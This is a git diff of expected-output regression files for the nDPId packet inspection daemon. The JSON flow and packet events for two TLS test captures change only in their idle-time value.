-01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054407415,"flow_last_seen":1639054407415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054407415,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} 
+00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":5906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054407576} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 7/7 diff --git a/test/results/tls_verylong_certificate.pcap.out b/test/results/tls_verylong_certificate.pcap.out index 1c20e32ac..b26fdbbf9 100644 --- a/test/results/tls_verylong_certificate.pcap.out +++ b/test/results/tls_verylong_certificate.pcap.out 
@@ -1,13 +1,13 @@ 00475{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1578254908457} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578254908457,"flow_last_seen":1578254908457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578254908457,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} 
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,emai
l.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578254908457,"flow_last_seen":1578254908457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578254908457,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.
101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} 